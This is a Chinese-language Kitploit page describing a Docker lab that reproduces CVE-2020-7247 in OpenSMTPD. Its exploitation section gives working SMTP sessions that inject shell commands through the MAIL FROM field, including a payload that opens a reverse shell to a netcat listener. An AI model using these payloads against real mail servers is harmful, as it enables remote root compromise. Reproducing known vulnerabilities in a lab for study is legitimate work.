Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-7247-reproducer — 基于Docker的环境,用于复现CVE-2020-7247(OpenSMTPD),附带一个Python利用脚本,通过精心构造的SMTP MAIL FROM字段实现任意命令执行和反弹shell。 | Kitploit
工具/GitHubGitHub/minhluannguyen/cve-2020-7247-reproducer
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育Payload 开发
GitHubminhluannguyen/cve-2020-7247-reproducer

CVE-2020-7247-reproducer

基于Docker的环境,用于复现CVE-2020-7247(OpenSMTPD),附带一个Python利用脚本,通过精心构造的SMTP MAIL FROM字段实现任意命令执行和反弹shell。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
131年前尚未审核
分享

CVE-2020-7247 (OpenSMTPD)

信息

此仓库包含构建Docker镜像所需的文件,该镜像包含易受攻击的OpenSMTPD (6.6.1p1)环境。该漏洞允许攻击者通过特制的SMTP会话(特别是MAIL FROM字段)执行任意命令。

用法

  1. 构建Docker镜像(基于Debian):
root@kitploit:~
docker build -t opensmtpd-vuln -f Dockerfile .
docker run -it --rm --name opensmtpd-vuln-test opensmtpd-vuln /bin/bash
smtpd -dv
  1. 构建Nix镜像:
root@kitploit:~
nix-build opensmtpd-vuln.nix
docker load < result
docker run -it --rm opensmtpd-vuln-nix /bin/bash
smtpd -dv

漏洞利用

  1. 利用漏洞:

3.1. 执行任意命令:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;touch secret.txt;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

Hello Bonjour Xin chào
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

3.2. 获取反弹Shell:

设置监听器:

root@kitploit:~
nc -lnvp 8080

运行exploit.py脚本(在另一个终端):

root@kitploit:~
python3 exploit.py

或者手动执行:

root@kitploit:~
$nc 172.17.0.2 25
220 debian ESMTP OpenSMTPD
HELO toto  
250 debian Hello toto [172.17.0.1], pleased to meet you
MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>
250 2.0.0 Ok
RCPT TO:<[email protected]>
250 2.1.5 Destination address valid: Recipient ok
data
354 Enter mail, end with "." on a line by itself

#0
#1
#2
#3
#4
#5
#6
#7
#8
#9
#a
#b
#c
#d
sh -c 'echo "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1" | bash'
.
250 2.0.0 09cb8342 Message accepted for delivery
QUIT
221 2.0.0 Bye

现在您应该拥有主机上root的Shell。

参考

  • OpenSMTPD
  • NVD
下载工具